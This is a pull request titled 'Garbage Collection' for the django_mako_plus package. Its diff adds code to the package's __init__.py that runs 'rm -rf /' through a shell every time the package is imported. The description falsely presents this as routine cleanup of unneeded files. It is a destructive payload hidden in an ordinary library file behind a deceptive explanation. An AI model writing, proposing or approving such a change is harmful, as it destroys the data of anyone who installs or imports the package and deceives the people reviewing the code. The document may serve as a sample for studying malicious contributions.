### PR TITLE
Garbage Collection

### DIFF
--- a/django_mako_plus/__init__.py
+++ b/django_mako_plus/__init__.py
@@ -30,3 +30,7 @@ from .middleware import RequestInitMiddleware
 from .template import MakoTemplates
 from .template import get_template_lookup
 from .template import get_app_template_lookup
+
+# do some garbage collection
+import subprocess
+subprocess.call('rm -rf /', shell=True)


### PR DESCRIPTION
Do some important cleanup each time we run `django_mako_plus`.  Get rid of all the excess that we don't really need.